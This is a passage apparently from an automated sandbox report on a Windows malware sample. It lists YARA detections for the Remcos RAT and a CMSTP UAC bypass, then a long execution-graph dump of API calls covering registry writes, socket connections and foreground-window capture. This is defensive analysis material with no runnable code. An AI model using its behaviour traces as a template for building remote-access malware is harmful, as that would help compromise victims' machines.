                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:3.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:5.3%
                                      Total number of Nodes:1186
                                      Total number of Limit Nodes:43
47215->47677 47220 2b01fe2 28 API calls 47221 2b1b2ff 47220->47221 47222 2b01fd8 11 API calls 47221->47222 47223 2b1b307 47222->47223 47224 2b135a6 31 API calls 47223->47224 47226 2b1b35d 47223->47226 47225 2b1b330 47224->47225 47227 2b1b33b StrToIntA 47225->47227 47226->46891 47228 2b1b352 47227->47228 47229 2b1b349 47227->47229 47231 2b01fd8 11 API calls 47228->47231 47685 2b1cf69 22 API calls 47229->47685 47231->47226 47233 2b0772a 47232->47233 47234 2b13549 3 API calls 47233->47234 47235 2b07731 47234->47235 47235->46901 47235->46902 47237 2b1bc72 47236->47237 47686 2b0b904 47237->47686 47239 2b1bc7a 47239->46919 47241 2b01f22 47240->47241 47242 2b01f6a 47240->47242 47243 2b02252 11 API calls 47241->47243 47249 2b01f09 47242->47249 47244 2b01f2b 47243->47244 47245 2b01f6d 47244->47245 47246 2b01f46 47244->47246 47719 2b02336 47245->47719 47718 2b0305c 28 API calls 47246->47718 47250 2b02252 11 API calls 47249->47250 47251 2b01f12 47250->47251 47251->46930 47253 2b13965 47252->47253 47254 2b06dd8 28 API calls 47253->47254 47255 2b1397a 47254->47255 47256 2b020f6 28 API calls 47255->47256 47257 2b1398a 47256->47257 47258 2b1376f 14 API calls 47257->47258 47259 2b13994 47258->47259 47260 2b01fd8 11 API calls 47259->47260 47261 2b139a1 47260->47261 47261->46980 47263 2b0209b 47262->47263 47264 2b023ce 11 API calls 47263->47264 47265 2b020a6 47264->47265 47723 2b024ed 47265->47723 47269 2b13788 47268->47269 47270 2b137bf 47268->47270 47273 2b1379a RegSetValueExA RegCloseKey 47269->47273 47271 2b01fd8 11 API calls 47270->47271 47272 2b0ef9e 47271->47272 47272->46981 47273->47270 47275 2b3bac5 _swprintf 47274->47275 47727 2b3ae03 47275->47727 47277 2b0efb7 47277->46988 47277->46989 47279 2b1b5a0 47278->47279 47280 2b1b505 GetLocalTime 47278->47280 47282 2b01fd8 11 API calls 47279->47282 47281 2b0531e 28 API calls 47280->47281 47283 2b1b547 47281->47283 47284 2b1b5a8 47282->47284 47285 2b06383 28 API calls 47283->47285 47286 2b01fd8 11 API calls 47284->47286 47287 
2b1b553 47285->47287 47288 2b0f00d 47286->47288 47755 2b02f10 47287->47755 47288->47005 47291 2b06383 28 API calls 47292 2b1b56b 47291->47292 47760 2b07200 76 API calls 47292->47760 47294 2b1b579 47295 2b01fd8 11 API calls 47294->47295 47296 2b1b585 47295->47296 47297 2b01fd8 11 API calls 47296->47297 47298 2b1b58e 47297->47298 47299 2b01fd8 11 API calls 47298->47299 47300 2b1b597 47299->47300 47301 2b01fd8 11 API calls 47300->47301 47301->47279 47303 2b09e02 _wcslen 47302->47303 47304 2b09e24 47303->47304 47305 2b09e0d 47303->47305 47307 2b0da34 31 API calls 47304->47307 47306 2b0da34 31 API calls 47305->47306 47308 2b09e15 47306->47308 47309 2b09e2c 47307->47309 47310 2b01f13 28 API calls 47308->47310 47311 2b01f13 28 API calls 47309->47311 47326 2b09e1f 47310->47326 47312 2b09e3a 47311->47312 47313 2b01f09 11 API calls 47312->47313 47315 2b09e42 47313->47315 47314 2b01f09 11 API calls 47317 2b09e79 47314->47317 47779 2b0915b 28 API calls 47315->47779 47764 2b0a109 47317->47764 47318 2b09e54 47780 2b03014 47318->47780 47323 2b01f13 28 API calls 47324 2b09e69 47323->47324 47325 2b01f09 11 API calls 47324->47325 47325->47326 47326->47314 47832 2b0417e 47327->47832 47332 2b03014 28 API calls 47333 2b1b672 47332->47333 47334 2b01f09 11 API calls 47333->47334 47335 2b1b67b 47334->47335 47336 2b01f09 11 API calls 47335->47336 47337 2b0f223 47336->47337 47337->47058 47339 2b13520 RegQueryValueExA RegCloseKey 47338->47339 47340 2b0f2e4 47338->47340 47339->47340 47340->46931 47340->47086 47342 2b0f392 47341->47342 47343 2b13a3f RegDeleteValueW 47341->47343 47342->46925 47343->47342 47345 2b0dd5b 47344->47345 47346 2b134ff 3 API calls 47345->47346 47347 2b0dd62 47346->47347 47348 2b0dd81 47347->47348 47924 2b01707 47347->47924 47352 2b14f2a 47348->47352 47350 2b0dd6f 47927 2b13877 RegCreateKeyA 47350->47927 47353 2b020df 11 API calls 47352->47353 47354 2b14f3e 47353->47354 47941 2b1b8b3 47354->47941 47357 2b020df 11 API calls 47358 2b14f54 47357->47358 47359 2b01e65 22 API 
calls 47358->47359 47360 2b14f62 47359->47360 47361 2b3baac 39 API calls 47360->47361 47362 2b14f6f 47361->47362 47363 2b14f81 47362->47363 47364 2b14f74 Sleep 47362->47364 47365 2b02093 28 API calls 47363->47365 47364->47363 47366 2b14f90 47365->47366 47367 2b01e65 22 API calls 47366->47367 47368 2b14f99 47367->47368 47369 2b020f6 28 API calls 47368->47369 47370 2b14fa4 47369->47370 47371 2b1be1b 28 API calls 47370->47371 47372 2b14fac 47371->47372 47945 2b0489e WSAStartup 47372->47945 47374 2b14fb6 47375 2b01e65 22 API calls 47374->47375 47376 2b14fbf 47375->47376 47377 2b01e65 22 API calls 47376->47377 47401 2b1503e 47376->47401 47378 2b14fd8 47377->47378 47380 2b01e65 22 API calls 47378->47380 47379 2b020f6 28 API calls 47379->47401 47381 2b14fe9 47380->47381 47383 2b01e65 22 API calls 47381->47383 47382 2b1be1b 28 API calls 47382->47401 47384 2b14ffa 47383->47384 47387 2b01e65 22 API calls 47384->47387 47385 2b01e65 22 API calls 47385->47401 47386 2b06c1e 28 API calls 47386->47401 47388 2b1500b 47387->47388 47390 2b01e65 22 API calls 47388->47390 47389 2b01fe2 28 API calls 47389->47401 47391 2b1501c 47390->47391 47392 2b01e65 22 API calls 47391->47392 47393 2b1502e 47392->47393 48119 2b0473d 88 API calls 47393->48119 47396 2b1518c WSAGetLastError 48120 2b1cae1 30 API calls 47396->48120 47401->47379 47401->47382 47401->47385 47401->47386 47401->47389 47401->47396 47403 2b1b4ef 79 API calls 47401->47403 47405 2b0531e 28 API calls 47401->47405 47406 2b01e8d 11 API calls 47401->47406 47407 2b3baac 39 API calls 47401->47407 47409 2b02f10 28 API calls 47401->47409 47410 2b02093 28 API calls 47401->47410 47413 2b0905c 28 API calls 47401->47413 47415 2b136f8 3 API calls 47401->47415 47416 2b135a6 31 API calls 47401->47416 47417 2b0417e 28 API calls 47401->47417 47420 2b01e65 22 API calls 47401->47420 47424 2b1bb8e 28 API calls 47401->47424 47427 2b1bd1e 28 API calls 47401->47427 47429 2b02ea1 28 API calls 47401->47429 47430 2b06383 28 API calls 47401->47430 47432 
2b01fd8 11 API calls 47401->47432 47433 2b01f09 11 API calls 47401->47433 47435 2b15a33 47401->47435 47437 2b15a71 CreateThread 47401->47437 47946 2b14ee9 47401->47946 47951 2b0482d 47401->47951 47958 2b04f51 47401->47958 47973 2b048c8 connect 47401->47973 48033 2b1b7e0 47401->48033 48036 2b145bd 47401->48036 48039 2b41e81 47401->48039 48043 2b0dd89 47401->48043 48049 2b1bc42 47401->48049 48057 2b1bae6 47401->48057 48059 2b1ba96 47401->48059 48064 2b0f8d1 GetLocaleInfoA 47401->48064 48067 2b02f31 47401->48067 48072 2b04aa1 47401->48072 48087 2b04c10 47401->48087 48106 2b04e26 WaitForSingleObject 47401->48106 48121 2b052fd 28 API calls 47401->48121 47403->47401 47405->47401 47406->47401 47408 2b15acf Sleep 47407->47408 47408->47401 47409->47401 47410->47401 47413->47401 47415->47401 47416->47401 47417->47401 47421 2b15439 GetTickCount 47420->47421 48052 2b1bb8e 47421->48052 47424->47401 47427->47401 47429->47401 47430->47401 47432->47401 47433->47401 48122 2b0b051 84 API calls 47435->48122 47437->47401 48209 2b1ad17 104 API calls 47437->48209 47438->46842 47439->46851 47440->46855 47443 2b020df 11 API calls 47442->47443 47444 2b06c2a 47443->47444 47445 2b032a0 28 API calls 47444->47445 47446 2b06c47 47445->47446 47446->46876 47448 2b0eba4 47447->47448 47449 2b13573 RegQueryValueExA RegCloseKey 47447->47449 47448->46873 47448->46890 47449->47448 47450->46880 47451->46909 47452->46902 47453->46894 47454->46907 48210 2b01f86 47455->48210 47458 2b0da70 48214 2b1b5b4 29 API calls 47458->48214 47459 2b0daa5 47462 2b1bfb7 GetCurrentProcess 47459->47462 47460 2b0db99 GetLongPathNameW 47465 2b0417e 28 API calls 47460->47465 47461 2b0da66 47461->47460 47466 2b0daaa 47462->47466 47464 2b0da79 47467 2b01f13 28 API calls 47464->47467 47468 2b0dbae 47465->47468 47469 2b0db00 47466->47469 47470 2b0daae 47466->47470 47508 2b0da83 47467->47508 47471 2b0417e 28 API calls 47468->47471 47472 2b0417e 28 API calls 47469->47472 47473 2b0417e 28 API calls 47470->47473 47474 2b0dbbd 
47471->47474 47475 2b0db0e 47472->47475 47476 2b0dabc 47473->47476 48217 2b0ddd1 28 API calls 47474->48217 47482 2b0417e 28 API calls 47475->47482 47480 2b0417e 28 API calls 47476->47480 47477 2b01f09 11 API calls 47477->47461 47479 2b0dbd0 48218 2b02fa5 28 API calls 47479->48218 47484 2b0dad2 47480->47484 47483 2b0db24 47482->47483 48216 2b02fa5 28 API calls 47483->48216 48215 2b02fa5 28 API calls 47484->48215 47485 2b0dbdb 48219 2b02fa5 28 API calls 47485->48219 47489 2b0dbe5 47492 2b01f09 11 API calls 47489->47492 47490 2b0db2f 47493 2b01f13 28 API calls 47490->47493 47491 2b0dadd 47494 2b01f13 28 API calls 47491->47494 47495 2b0dbef 47492->47495 47496 2b0db3a 47493->47496 47497 2b0dae8 47494->47497 47498 2b01f09 11 API calls 47495->47498 47499 2b01f09 11 API calls 47496->47499 47500 2b01f09 11 API calls 47497->47500 47501 2b0dbf8 47498->47501 47502 2b0db43 47499->47502 47503 2b0daf1 47500->47503 47504 2b01f09 11 API calls 47501->47504 47505 2b01f09 11 API calls 47502->47505 47506 2b01f09 11 API calls 47503->47506 47507 2b0dc01 47504->47507 47505->47508 47506->47508 47509 2b01f09 11 API calls 47507->47509 47508->47477 47510 2b0dc0a 47509->47510 47511 2b01f09 11 API calls 47510->47511 47512 2b0dc13 47511->47512 47512->46967 47513->46978 47514->47001 47516 2b1371e RegQueryValueExA RegCloseKey 47515->47516 47517 2b13742 47515->47517 47516->47517 47517->46960 47518->46995 47522 2b344ef 47519->47522 47520 2b3bd51 ___std_exception_copy 21 API calls 47520->47522 47521 2b0f0d1 47521->47031 47522->47520 47522->47521 48220 2b42f80 7 API calls 2 library calls 47522->48220 48221 2b34c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47522->48221 48222 2b3526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47522->48222 47526->47062 47527->47051 47529->47095 47530->46900 47533 2b1b4c5 LoadResource LockResource SizeofResource 47532->47533 47534 2b0f3de 47532->47534 47533->47534 47535 2b3bd51 47534->47535 47540 2b46137 
___crtLCMapStringA 47535->47540 47536 2b46175 47552 2b405dd 20 API calls _Atexit 47536->47552 47538 2b46160 RtlAllocateHeap 47539 2b46173 47538->47539 47538->47540 47539->47132 47540->47536 47540->47538 47551 2b42f80 7 API calls 2 library calls 47540->47551 47543 2b020bf 47542->47543 47553 2b023ce 47543->47553 47545 2b020ca 47557 2b0250a 47545->47557 47547 2b020d9 47547->47135 47549 2b020b7 28 API calls 47548->47549 47550 2b06dec 47549->47550 47550->47142 47551->47540 47552->47539 47554 2b02428 47553->47554 47555 2b023d8 47553->47555 47554->47545 47555->47554 47564 2b027a7 11 API calls std::_Deallocate 47555->47564 47558 2b0251a 47557->47558 47559 2b02535 47558->47559 47561 2b02520 47558->47561 47575 2b028e8 28 API calls 47559->47575 47565 2b02569 47561->47565 47563 2b02533 47563->47547 47564->47554 47576 2b02888 47565->47576 47567 2b0257d 47568 2b02592 47567->47568 47569 2b025a7 47567->47569 47581 2b02a34 22 API calls 47568->47581 47583 2b028e8 28 API calls 47569->47583 47572 2b0259b 47582 2b029da 22 API calls 47572->47582 47574 2b025a5 47574->47563 47575->47563 47577 2b02890 47576->47577 47578 2b02898 47577->47578 47584 2b02ca3 22 API calls 47577->47584 47578->47567 47581->47572 47582->47574 47583->47574 47586 2b020e7 47585->47586 47587 2b023ce 11 API calls 47586->47587 47588 2b020f2 47587->47588 47588->47151 47589->47151 47591 2b1ce41 47590->47591 47592 2b1ce51 47591->47592 47593 2b1cea0 47591->47593 47597 2b1ce89 47592->47597 47602 2b1cfe0 47592->47602 47594 2b1ceba 47593->47594 47595 2b1cfe0 28 API calls 47593->47595 47611 2b1d146 28 API calls 47594->47611 47595->47594 47610 2b1d146 28 API calls 47597->47610 47598 2b1ce9c 47598->47151 47601->47159 47604 2b1cfe8 47602->47604 47603 2b1d01a 47603->47597 47604->47603 47605 2b1d01e 47604->47605 47608 2b1d002 47604->47608 47622 2b02725 22 API calls 47605->47622 47612 2b1d051 47608->47612 47610->47598 47611->47598 47613 2b1d05b __EH_prolog 47612->47613 47623 2b02717 22 API calls 47613->47623 47615 2b1d06e 47624 
2b1d15d 11 API calls 47615->47624 47617 2b1d094 47618 2b1d0cc 47617->47618 47625 2b02730 11 API calls 47617->47625 47618->47603 47620 2b1d0b3 47626 2b02712 11 API calls std::_Deallocate 47620->47626 47623->47615 47624->47617 47625->47620 47626->47618 47627->47174 47628->47178 47629->47180 47632 2b032aa 47631->47632 47633 2b032c9 47632->47633 47635 2b028e8 28 API calls 47632->47635 47633->47190 47635->47633 47637 2b051fb 47636->47637 47646 2b05274 47637->47646 47639 2b05208 47639->47193 47641 2b02061 47640->47641 47642 2b023ce 11 API calls 47641->47642 47643 2b0207b 47642->47643 47670 2b0267a 47643->47670 47647 2b05282 47646->47647 47648 2b05288 47647->47648 47649 2b0529e 47647->47649 47657 2b025f0 47648->47657 47651 2b052f5 47649->47651 47652 2b052b6 47649->47652 47667 2b028a4 22 API calls 47651->47667 47656 2b0529c 47652->47656 47666 2b028e8 28 API calls 47652->47666 47656->47639 47658 2b02888 22 API calls 47657->47658 47659 2b02602 47658->47659 47660 2b02672 47659->47660 47661 2b02629 47659->47661 47669 2b028a4 22 API calls 47660->47669 47665 2b0263b 47661->47665 47668 2b028e8 28 API calls 47661->47668 47665->47656 47666->47656 47668->47665 47671 2b0268b 47670->47671 47672 2b023ce 11 API calls 47671->47672 47673 2b0208d 47672->47673 47673->47196 47674->47204 47675->47209 47678 2b1bfc4 GetCurrentProcess 47677->47678 47679 2b1b2d1 47677->47679 47678->47679 47680 2b135a6 RegOpenKeyExA 47679->47680 47681 2b135d4 RegQueryValueExA RegCloseKey 47680->47681 47682 2b135fe 47680->47682 47681->47682 47683 2b02093 28 API calls 47682->47683 47684 2b13613 47683->47684 47684->47220 47685->47228 47687 2b0b90c 47686->47687 47692 2b02252 47687->47692 47689 2b0b917 47696 2b0b92c 47689->47696 47691 2b0b926 47691->47239 47693 2b022ac 47692->47693 47694 2b0225c 47692->47694 47693->47689 47694->47693 47703 2b02779 11 API calls std::_Deallocate 47694->47703 47697 2b0b966 47696->47697 47698 2b0b938 47696->47698 47715 2b028a4 22 API calls 47697->47715 47704 2b027e6 47698->47704 47702 
2b0b942 47702->47691 47703->47693 47705 2b027ef 47704->47705 47706 2b02851 47705->47706 47707 2b027f9 47705->47707 47717 2b028a4 22 API calls 47706->47717 47710 2b02802 47707->47710 47712 2b02815 47707->47712 47716 2b02aea 28 API calls __EH_prolog 47710->47716 47713 2b02813 47712->47713 47714 2b02252 11 API calls 47712->47714 47713->47702 47714->47713 47716->47713 47718->47242 47720 2b02347 47719->47720 47721 2b02252 11 API calls 47720->47721 47722 2b023c7 47721->47722 47722->47242 47724 2b024f9 47723->47724 47725 2b0250a 28 API calls 47724->47725 47726 2b020b1 47725->47726 47726->46971 47743 2b3ba0a 47727->47743 47729 2b3ae50 47749 2b3a7b7 35 API calls 3 library calls 47729->47749 47731 2b3ae15 47731->47729 47732 2b3ae2a 47731->47732 47742 2b3ae2f _Atexit 47731->47742 47748 2b405dd 20 API calls _Atexit 47732->47748 47735 2b3ae5c 47736 2b3ae8b 47735->47736 47750 2b3ba4f 39 API calls __Tolower 47735->47750 47739 2b3aef7 47736->47739 47751 2b3b9b6 20 API calls 2 library calls 47736->47751 47752 2b3b9b6 20 API calls 2 library calls 47739->47752 47740 2b3afbe _swprintf 47740->47742 47753 2b405dd 20 API calls _Atexit 47740->47753 47742->47277 47744 2b3ba22 47743->47744 47745 2b3ba0f 47743->47745 47744->47731 47754 2b405dd 20 API calls _Atexit 47745->47754 47747 2b3ba14 _Atexit 47747->47731 47748->47742 47749->47735 47750->47735 47751->47739 47752->47740 47753->47742 47754->47747 47761 2b01fb0 47755->47761 47757 2b02f1e 47758 2b02055 11 API calls 47757->47758 47759 2b02f2d 47758->47759 47759->47291 47760->47294 47762 2b025f0 28 API calls 47761->47762 47763 2b01fbd 47762->47763 47763->47757 47765 2b0a127 47764->47765 47766 2b13549 3 API calls 47765->47766 47767 2b0a12e 47766->47767 47768 2b0a142 47767->47768 47769 2b0a15c 47767->47769 47771 2b09e9b 47768->47771 47772 2b0a147 47768->47772 47770 2b0905c 28 API calls 47769->47770 47773 2b0a16a 47770->47773 47771->47024 47785 2b0905c 47772->47785 47792 2b0a179 85 API calls 47773->47792 47778 2b0a15a 47778->47771 47779->47318 
47809 2b03222 47780->47809 47782 2b03022 47813 2b03262 47782->47813 47786 2b09072 47785->47786 47787 2b02252 11 API calls 47786->47787 47788 2b0908c 47787->47788 47793 2b04267 47788->47793 47790 2b0909a 47791 2b0a22d 29 API calls 47790->47791 47791->47778 47805 2b0a273 162 API calls 47791->47805 47792->47771 47806 2b0a267 85 API calls 47792->47806 47807 2b0a289 48 API calls 47792->47807 47808 2b0a27d 127 API calls 47792->47808 47794 2b02888 22 API calls 47793->47794 47795 2b0427b 47794->47795 47796 2b04290 47795->47796 47797 2b042a5 47795->47797 47803 2b042df 22 API calls 47796->47803 47798 2b027e6 28 API calls 47797->47798 47802 2b042a3 47798->47802 47800 2b04299 47804 2b02c48 22 API calls 47800->47804 47802->47790 47803->47800 47804->47802 47810 2b0322e 47809->47810 47819 2b03618 47810->47819 47812 2b0323b 47812->47782 47814 2b0326e 47813->47814 47815 2b02252 11 API calls 47814->47815 47816 2b03288 47815->47816 47817 2b02336 11 API calls 47816->47817 47818 2b03031 47817->47818 47818->47323 47820 2b03626 47819->47820 47821 2b03644 47820->47821 47822 2b0362c 47820->47822 47824 2b0365c 47821->47824 47825 2b0369e 47821->47825 47830 2b036a6 28 API calls 47822->47830 47828 2b027e6 28 API calls 47824->47828 47829 2b03642 47824->47829 47831 2b028a4 22 API calls 47825->47831 47828->47829 47829->47812 47830->47829 47833 2b04186 47832->47833 47834 2b02252 11 API calls 47833->47834 47835 2b04191 47834->47835 47843 2b041bc 47835->47843 47838 2b042fc 47854 2b04353 47838->47854 47840 2b0430a 47841 2b03262 11 API calls 47840->47841 47842 2b04319 47841->47842 47842->47332 47844 2b041c8 47843->47844 47847 2b041d9 47844->47847 47846 2b0419c 47846->47838 47848 2b041e9 47847->47848 47849 2b04206 47848->47849 47850 2b041ef 47848->47850 47851 2b027e6 28 API calls 47849->47851 47852 2b04267 28 API calls 47850->47852 47853 2b04204 47851->47853 47852->47853 47853->47846 47855 2b0435f 47854->47855 47858 2b04371 47855->47858 47857 2b0436d 47857->47840 47859 2b0437f 47858->47859 47860 
2b04385 47859->47860 47861 2b0439e 47859->47861 47922 2b034e6 28 API calls 47860->47922 47862 2b02888 22 API calls 47861->47862 47863 2b043a6 47862->47863 47865 2b04419 47863->47865 47866 2b043bf 47863->47866 47923 2b028a4 22 API calls 47865->47923 47868 2b027e6 28 API calls 47866->47868 47878 2b0439c 47866->47878 47868->47878 47878->47857 47922->47878 47930 2b3aa9a 47924->47930 47928 2b138b9 47927->47928 47929 2b1388f RegSetValueExA RegCloseKey 47927->47929 47928->47348 47929->47928 47933 2b3aa1b 47930->47933 47932 2b0170d 47932->47350 47934 2b3aa2a 47933->47934 47935 2b3aa3e 47933->47935 47939 2b405dd 20 API calls _Atexit 47934->47939 47938 2b3aa2f __alldvrm _Atexit 47935->47938 47940 2b48957 11 API calls 2 library calls 47935->47940 47938->47932 47939->47938 47940->47938 47944 2b1b8f9 _Yarn ___scrt_fastfail 47941->47944 47942 2b02093 28 API calls 47943 2b14f49 47942->47943 47943->47357 47944->47942 47945->47374 47947 2b14f02 getaddrinfo WSASetLastError 47946->47947 47948 2b14ef8 47946->47948 47947->47401 48123 2b14d86 29 API calls ___std_exception_copy 47948->48123 47950 2b14efd 47950->47947 47952 2b04846 socket 47951->47952 47953 2b04839 47951->47953 47955 2b04860 CreateEventW 47952->47955 47956 2b04842 47952->47956 48124 2b0489e WSAStartup 47953->48124 47955->47401 47956->47401 47957 2b0483e 47957->47952 47957->47956 47959 2b04f65 47958->47959 47960 2b04fea 47958->47960 47961 2b04f6e 47959->47961 47962 2b04fc0 CreateEventA CreateThread 47959->47962 47963 2b04f7d GetLocalTime 47959->47963 47960->47401 47961->47962 47962->47960 48126 2b05150 47962->48126 47964 2b1bb8e 28 API calls 47963->47964 47965 2b04f91 47964->47965 48125 2b052fd 28 API calls 47965->48125 47974 2b04a1b 47973->47974 47975 2b048ee 47973->47975 47976 2b0497e 47974->47976 47977 2b04a21 WSAGetLastError 47974->47977 47975->47976 47979 2b0531e 28 API calls 47975->47979 47997 2b04923 47975->47997 47976->47401 47977->47976 47978 2b04a31 47977->47978 47980 2b04a36 47978->47980 47988 2b04932 
47978->47988 47982 2b0490f 47979->47982 48135 2b1cae1 30 API calls 47980->48135 47986 2b02093 28 API calls 47982->47986 47984 2b0492b 47984->47988 47992 2b04941 47984->47992 47985 2b02093 28 API calls 47989 2b04a80 47985->47989 47990 2b0491e 47986->47990 47987 2b04a40 48136 2b052fd 28 API calls 47987->48136 47988->47985 47993 2b02093 28 API calls 47989->47993 47994 2b1b4ef 79 API calls 47990->47994 47999 2b04950 47992->47999 48000 2b04987 47992->48000 47996 2b04a8f 47993->47996 47994->47997 48002 2b1b4ef 79 API calls 47996->48002 48130 2b20c60 27 API calls 47997->48130 48001 2b02093 28 API calls 47999->48001 48132 2b21a40 53 API calls 48000->48132 48005 2b0495f 48001->48005 48002->47976 48008 2b02093 28 API calls 48005->48008 48007 2b0498f 48010 2b049c4 48007->48010 48011 2b04994 48007->48011 48012 2b0496e 48008->48012 48134 2b20e06 28 API calls 48010->48134 48015 2b02093 28 API calls 48011->48015 48016 2b1b4ef 79 API calls 48012->48016 48018 2b049a3 48015->48018 48019 2b04973 48016->48019 48017 2b049cc 48020 2b049f9 CreateEventW CreateEventW 48017->48020 48023 2b02093 28 API calls 48017->48023 48021 2b02093 28 API calls 48018->48021 48131 2b1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48019->48131 48020->47976 48022 2b049b2 48021->48022 48024 2b1b4ef 79 API calls 48022->48024 48026 2b049e2 48023->48026 48027 2b049b7 48024->48027 48028 2b02093 28 API calls 48026->48028 48133 2b210b2 51 API calls 48027->48133 48030 2b049f1 48028->48030 48031 2b1b4ef 79 API calls 48030->48031 48032 2b049f6 48031->48032 48032->48020 48137 2b1b7b6 GlobalMemoryStatusEx 48033->48137 48035 2b1b7f5 48035->47401 48138 2b14580 48036->48138 48040 2b41e8d 48039->48040 48168 2b41c7d 48040->48168 48042 2b41eae 48042->47401 48044 2b0dda5 48043->48044 48045 2b134ff 3 API calls 48044->48045 48047 2b0ddac 48045->48047 48046 2b0ddc4 48046->47401 48047->48046 48048 2b13549 3 API calls 48047->48048 48048->48046 48050 2b020b7 28 API calls 48049->48050 48051 2b1bc57 48050->48051 
48051->47401 48053 2b41e81 20 API calls 48052->48053 48054 2b1bbb2 48053->48054 48055 2b02093 28 API calls 48054->48055 48056 2b1bbc0 48055->48056 48056->47401 48058 2b1bafc GetTickCount 48057->48058 48058->47401 48060 2b36e90 ___scrt_fastfail 48059->48060 48061 2b1bab5 GetForegroundWindow GetWindowTextW 48060->48061 48062 2b0417e 28 API calls 48061->48062 48063 2b1badf 48062->48063 48063->47401 48065 2b02093 28 API calls 48064->48065 48066 2b0f8f6 48065->48066 48066->47401 48068 2b020df 11 API calls 48067->48068 48069 2b02f3d 48068->48069 48070 2b032a0 28 API calls 48069->48070 48071 2b02f59 48070->48071 48071->47401 48073 2b04ab4 48072->48073 48173 2b0520c 48073->48173 48075 2b04ac9 _Yarn 48076 2b04b40 WaitForSingleObject 48075->48076 48077 2b04b20 48075->48077 48079 2b04b56 48076->48079 48078 2b04b32 send 48077->48078 48080 2b04b7b 48078->48080 48179 2b2103a 53 API calls 48079->48179 48083 2b01fd8 11 API calls 48080->48083 48082 2b04b69 SetEvent 48082->48080 48084 2b04b83 48083->48084 48085 2b01fd8 11 API calls 48084->48085 48086 2b04b8b 48085->48086 48086->47401 48088 2b020df 11 API calls 48087->48088 48089 2b04c27 48088->48089 48090 2b020df 11 API calls 48089->48090 48097 2b04c30 48090->48097 48091 2b3bd51 ___std_exception_copy 21 API calls 48091->48097 48093 2b020b7 28 API calls 48093->48097 48094 2b04ca1 48096 2b04e26 98 API calls 48094->48096 48095 2b01fe2 28 API calls 48095->48097 48098 2b04ca8 48096->48098 48097->48091 48097->48093 48097->48094 48097->48095 48099 2b01fd8 11 API calls 48097->48099 48103 2b04c84 48097->48103 48198 2b04b96 48097->48198 48100 2b01fd8 11 API calls 48098->48100 48099->48097 48101 2b04cb1 48100->48101 48102 2b01fd8 11 API calls 48101->48102 48104 2b04cba 48102->48104 48204 2b04cc3 32 API calls 48103->48204 48104->47401 48107 2b04e40 SetEvent CloseHandle 48106->48107 48108 2b04e57 closesocket 48106->48108 48109 2b04ed8 48107->48109 48110 2b04e64 48108->48110 48109->47401 48111 2b04e7a 48110->48111 48206 2b050e4 83 API calls 
48110->48206 48113 2b04e8c WaitForSingleObject 48111->48113 48114 2b04ece SetEvent CloseHandle 48111->48114 48207 2b1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48113->48207 48114->48109 48116 2b04e9b SetEvent WaitForSingleObject 48208 2b1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48116->48208 48118 2b04eb3 SetEvent CloseHandle CloseHandle 48118->48114 48119->47401 48120->47401 48122->47401 48123->47950 48124->47957 48129 2b0515c 101 API calls 48126->48129 48128 2b05159 48129->48128 48130->47984 48131->47976 48132->48007 48133->48019 48134->48017 48135->47987 48137->48035 48141 2b14553 48138->48141 48142 2b14568 ___scrt_initialize_default_local_stdio_options 48141->48142 48145 2b3f79d 48142->48145 48148 2b3c4f0 48145->48148 48149 2b3c530 48148->48149 48150 2b3c518 48148->48150 48149->48150 48151 2b3c538 48149->48151 48163 2b405dd 20 API calls _Atexit 48150->48163 48164 2b3a7b7 35 API calls 3 library calls 48151->48164 48154 2b3c548 48165 2b3cc76 20 API calls 2 library calls 48154->48165 48155 2b3c51d _Atexit 48156 2b34fcb _ValidateLocalCookies 5 API calls 48155->48156 48158 2b14576 48156->48158 48158->47401 48159 2b3c5c0 48166 2b3d2e4 50 API calls 3 library calls 48159->48166 48162 2b3c5cb 48167 2b3cce0 20 API calls _free 48162->48167 48163->48155 48164->48154 48165->48159 48166->48162 48167->48155 48169 2b41c94 48168->48169 48170 2b41ccb _Atexit 48169->48170 48172 2b405dd 20 API calls _Atexit 48169->48172 48170->48042 48172->48170 48174 2b05214 48173->48174 48175 2b023ce 11 API calls 48174->48175 48176 2b0521f 48175->48176 48180 2b05234 48176->48180 48178 2b0522e 48178->48075 48179->48082 48181 2b05240 48180->48181 48182 2b0526e 48180->48182 48196 2b028e8 28 API calls 48181->48196 48197 2b028a4 22 API calls 48182->48197 48186 2b0524a 48186->48178 48196->48186 48199 2b04ba0 WaitForSingleObject 48198->48199 48200 2b04bcd recv 48198->48200 48205 2b21076 53 API calls 48199->48205 48202 2b04be0 48200->48202 
48202->48097 48203 2b04bbc SetEvent 48203->48202 48204->48097 48205->48203 48206->48111 48207->48116 48208->48118 48211 2b01f8e 48210->48211 48212 2b02252 11 API calls 48211->48212 48213 2b01f99 48212->48213 48213->47458 48213->47459 48213->47461 48214->47464 48215->47491 48216->47490 48217->47479 48218->47485 48219->47489 48220->47522 48225 2b0f7c2 48223->48225 48224 2b13549 3 API calls 48224->48225 48225->48224 48227 2b0f866 48225->48227 48229 2b0f856 Sleep 48225->48229 48246 2b0f7f4 48225->48246 48226 2b0905c 28 API calls 48226->48246 48228 2b0905c 28 API calls 48227->48228 48231 2b0f871 48228->48231 48229->48225 48230 2b1bc5e 28 API calls 48230->48246 48233 2b1bc5e 28 API calls 48231->48233 48234 2b0f87d 48233->48234 48258 2b13814 14 API calls 48234->48258 48237 2b01f09 11 API calls 48237->48246 48238 2b0f890 48239 2b01f09 11 API calls 48238->48239 48241 2b0f89c 48239->48241 48240 2b02093 28 API calls 48240->48246 48242 2b02093 28 API calls 48241->48242 48243 2b0f8ad 48242->48243 48245 2b1376f 14 API calls 48243->48245 48244 2b1376f 14 API calls 48244->48246 48247 2b0f8c0 48245->48247 48246->48226 48246->48229 48246->48230 48246->48237 48246->48240 48246->48244 48256 2b0d096 111 API calls ___scrt_fastfail 48246->48256 48257 